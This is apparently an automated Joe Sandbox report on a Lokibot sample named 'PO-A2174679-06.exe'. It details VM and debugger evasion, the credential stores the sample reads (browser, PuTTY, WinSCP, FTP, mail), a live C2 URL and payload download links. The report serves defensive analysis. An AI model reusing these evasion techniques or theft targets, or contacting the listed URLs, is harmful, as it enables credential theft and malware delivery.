              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC6F5E NtWriteVirtualMemory
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC6F06 NtWriteVirtualMemory
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC70A5 second address: 0000000002BC70A5 instructions:
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC7263 second address: 0000000002BC7263 instructions:
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC6D02 second address: 0000000002BC6D02 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F0FBC787E78h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, bx 0x00000020 add edi, edx 0x00000022 cmp ax, cx 0x00000025 dec dword ptr [ebp+000000F8h] 0x0000002b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000032 jne 00007F0FBC787E55h 0x00000034 nop 0x00000035 call 00007F0FBC787EAAh 0x0000003a call 00007F0FBC787E88h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Tries to detect Any.run
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: PO-A2174679-06.exe, PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC70A5 second address: 0000000002BC70A5 instructions:
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC7263 second address: 0000000002BC7263 instructions:
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC6D02 second address: 0000000002BC6D02 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F0FBC787E78h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, bx 0x00000020 add edi, edx 0x00000022 cmp ax, cx 0x00000025 dec dword ptr [ebp+000000F8h] 0x0000002b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000032 jne 00007F0FBC787E55h 0x00000034 nop 0x00000035 call 00007F0FBC787EAAh 0x0000003a call 00007F0FBC787E88h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC6D22 second address: 0000000002BC6D22 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F0FBC870ADEh 0x0000001d popad 0x0000001e call 00007F0FBC87053Ah 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000000566D22 second address: 0000000000566D22 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F0FBC78853Eh 0x0000001d popad 0x0000001e call 00007F0FBC787F9Ah 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC0977 rdtsc
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Window / User API: threadDelayed 1628
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | TID: 6576 | Thread sleep count: 1628 > 30
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | TID: 4504 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | TID: 4504 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Thread sleep count: Count: 1628 delay: -5
Source: PO-A2174679-06.exe, 0000000B.00000002.501778520.0000000000A67000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWayer LightWeight Filter-0000
Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
Source: PO-A2174679-06.exe, PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC0699 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?
Hides threads from debuggers
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC0977 rdtsc
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC4291 NtSetInformationThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC72EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC641D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC7604 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC27A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC35F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC35EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC1F69 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC6963 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC754F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Process created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe'
Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC36C7 cpuid
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Remote Access Functionality:

Yara detected Lokibot
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection12 | Masquerading1 | OS Credential Dumping2 | Security Software Discovery721 | Remote Services | Email Collection1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion23 | Input Capture1 | Virtualization/Sandbox Evasion23 | Remote Desktop Protocol | Input Capture1 | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection12 | Credentials in Registry1 | Process Discovery1 | SMB/Windows Admin Shares | Archive Collected Data1 | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information1 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Data from Local System2 | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery323 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

Behavior Graph

(behavior graph image not reproduced)

Screenshots

(screenshot thumbnails not reproduced)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner
PO-A2174679-06.exe | 16% | Virustotal
PO-A2174679-06.exe | 2% | ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner
accessasia.com.hk | 0% | Virustotal

URLs

Source | Detection | Scanner | Label
http://accessasia.com.hk/ovation/five/fre.php | 0% | Avira URL Cloud | safe
http://sinatrasmob.com/pro/ovation_byHOXsph232.bin | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
accessasia.com.hk | 192.185.78.145 | true | true | | unknown
onedrive.live.com | unknown | unknown | false | | high
hrf0ga.bn.files.1drv.com | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://accessasia.com.hk/ovation/five/fre.php | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://cdn.discordapp.com/attachments/813514912135380996/813514973141532722/ovation_byHOXsph232.bin | PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | false | | high
https://onedrive.live.com/n | PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp | false | | high
https://onedrive.live.com/download?cid=B1076D30E2A6430F&resid=B1076D30E2A6430F%21110&authkey=AO3GCQa | PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | false | | high
https://onedrive.live.com/ | PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp | false | | high
https://hrf0ga.bn.files.1drv.com/ | PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp | false | | high
http://sinatrasmob.com/pro/ovation_byHOXsph232.bin | PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | false | Avira URL Cloud: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.185.78.145 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356484
Start date: 23.02.2021
Start time: 08:47:07
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 13s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: PO-A2174679-06.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/2@43/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 3.7% (good quality ratio 1%)
• Quality average: 10%
• Quality standard deviation: 17.1%
HCA Information:
• Successful, ratio: 70%
• Number of executed functions: 66
• Number of non-executed functions: 23
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 168.61.161.212, 51.104.139.180, 51.103.5.186, 52.147.198.201, 23.218.209.198, 13.88.21.125, 92.122.145.220, 40.88.32.150, 23.218.208.56, 51.11.168.160, 8.253.204.249, 8.248.117.254, 67.26.73.254, 8.253.204.120, 8.248.133.254, 92.122.213.247, 92.122.213.194, 13.107.42.13, 13.107.43.12, 52.155.217.156, 20.54.26.129
• Excluded domains from analysis (whitelisted): odc-bn-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, odc-bn-files-geo.onedrive.akadns.net, skypedataprdcoleus15.cloudapp.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, odc-bn-files-brs.onedrive.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, l-0004.l-msedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, displaycatalog.mp.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, odc-web-geo.onedrive.akadns.net, l-0003.dc-msedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus15.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            Time | Type | Description
                            08:49:27 | API Interceptor | 38x Sleep call for process: PO-A2174679-06.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            Match | Associated Sample Name / URL | Detection | Context
                            UNIFIEDLAYER-AS-1US | 22 FEB -PROCESSING.xlsx | malicious | 108.167.156.42
                             | CV-JOB REQUEST______PDF.EXE | malicious | 192.185.181.49
                             | PO.exe | malicious | 192.185.0.218
                             | Complaint-1091191320-02182021.xls | malicious | 192.185.16.95
                             | ESCANEAR_FACTURA-20794564552_docx.exe | malicious | 162.214.158.75
                             | AWB-INVOICE_PDF.exe | malicious | 192.185.46.55
                             | iAxkn PDF.exe | malicious | 192.185.100.181
                             | carta de pago pdf.exe | malicious | 192.185.5.166
                             | PO.exe | malicious | 108.179.232.42
                             | payment details.pdf.exe | malicious | 50.87.95.32
                             | new order.exe | malicious | 108.179.232.42
                             | CV-JOB REQUEST______pdf.exe | malicious | 192.185.181.49
                             | RdLlHaxEKP.exe | malicious | 162.214.184.71
                             | Drawings2.exe | malicious | 198.57.247.220
                             | EFT Remittance.xls | malicious | 162.241.120.180
                             | Remittance Advice.xls | malicious | 162.241.120.180
                             | Complaint_Letter_1212735678-02192021.xls | malicious | 192.185.17.119
                             | Complaint_Letter_1212735678-02192021.xls | malicious | 192.185.17.119
                             | SecuriteInfo.com.BehavesLike.Win32.Generic.ch.exe | malicious | 162.241.194.14
                             | SecuriteInfo.com.Trojan.PackedNET.546.1336.exe | malicious | 162.214.184.71

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                            Process:C:\Users\user\Desktop\PO-A2174679-06.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview: 1
                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                            Process:C:\Users\user\Desktop\PO-A2174679-06.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):7379
                            Entropy (8bit):0.6787210715847813
                            Encrypted:false
                            SSDEEP:12:fMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMet:9
                            MD5:DB6D68BC10AB34D28026CA8336B4E986
                            SHA1:7FE6C2D23DC859C0F3C2759679AE97CA6739AC9F
                            SHA-256:E8D86E10D4E8AEA44D547EDB65B18CC175894E362B31152AF38AEA03D9B93DB9
                            SHA-512:DA28A192C54BDD97D81A7D2ECE5B161220B6B7D9DD7C6CDE4F469A8F3EB0161C6A5A0588161377370C89EA9C421AAE396AE0E2BB481C287625A8B31472658D6D
                            Malicious:false
                            Reputation:low
                            Preview: ........................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user..............

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):5.623116556460363
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.15%
                            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:PO-A2174679-06.exe
                            File size:86016
                            MD5:fdec289fb4626dd56bbb55770ae5f432
                            SHA1:1a1f324185e6114fb1362b00f27fe8009a202361
                            SHA256:eb53256b217e27a7ab0f71be2181599a79dc0569dea7fdbc5b32cf96a6bc9109
                            SHA512:59cbf20bc1d2fb24430378ec9fa74107c91a6f491b51e9b04911ecd632cce524d4bd56042df8b3bcd8acd448d984bba6290cffa6739960e188d8c055c0f0b0f4
                            SSDEEP:1536:WafMF8sN5NZilPSBWNBEotYaYUtl8DLogSR:WHF95ilSUNBLtYaYUt7
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....5U................. ... ...............0....@................

                            File Icon

                            Icon Hash:74fae4f6c0c0f98c

                            Static PE Info

                            General

                            Entrypoint:0x4014c0
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                            DLL Characteristics:
                            Time Stamp:0x553582A1 [Mon Apr 20 22:50:09 2015 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:40c19fc273c48bb96f5b0a0c56f8b80b

                            Entrypoint Preview

                            Instruction
                            push 0040BA78h
                            call 00007F0FBCF6F3D5h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            inc eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+2Ah], ch
                            jmp 00007F0FE6D08284h
                            dec ebx
                            wait
                            inc ebx
                            pop es
                            mov esp, eax
                            insb
                            xchg eax, esi
                            pop ebx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax], eax
                            add byte ptr [eax], al
                            dec eax
                            add byte ptr [esi], al
                            inc eax
                            add dword ptr [ecx], 50h
                            jc 00007F0FBCF6F451h
                            push 00000065h
                            arpl word ptr [ebp+esi+00h], si
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4+00000307h], dh
                            add byte ptr [eax], al
                            dec esp
                            xor dword ptr [eax], eax
                            adc al, A1h
                            loop 00007F0FBCF6F407h
                            inc ebx
                            rcr ebp, FFFFFF87h
                            inc ebp
                            popfd
                            pop es
                            sub dh, byte ptr [esi-22h]
                            into
                            out C3h, al
                            imul esp, dword ptr [esi+42A39078h], 47h
                            xchg eax, edx
                            push ss
                            sbb byte ptr [esi], bl
                            and ah, bh
                            mov dl, 3Ah
                            dec edi
                            lodsd
                            xor ebx, dword ptr [ecx-48EE309Ah]
                            or al, 00h
                            stosb
                            add byte ptr [eax-2Dh], ah
                            xchg eax, ebx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jl 00007F0FBCF6F386h
                            add byte ptr [eax], al
                            pop eax
                            mov eax, dword ptr [0E000000h]
                            add byte ptr [eax+4Fh], cl
                            push esi
                            inc ebp
                            inc esp
                            push edx
                            inc ebp
                            inc edi
                            inc ebp
                            dec esp
                            push eax
                            push ebp
                            dec esi
                            push ebx
                            add byte ptr [50000801h], cl

                            Data Directories

                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x11d54 | 0x28 | .text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x8d0 | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x124 | .text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                            Sections

                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x1000 | 0x11234 | 0x12000 | False | 0.394232855903 | data | 6.11276286566 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .data | 0x13000 | 0xac8 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .rsrc | 0x14000 | 0x8d0 | 0x1000 | False | 0.12939453125 | data | 1.94796497587 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            Name | RVA | Size | Type | Language | Country
                            RT_ICON | 0x14368 | 0x568 | GLS_BINARY_LSB_FIRST | |
                            RT_GROUP_ICON | 0x14354 | 0x14 | data | |
                            RT_VERSION | 0x140f0 | 0x264 | data | Chinese | Taiwan

                            Imports

                            DLL | Import
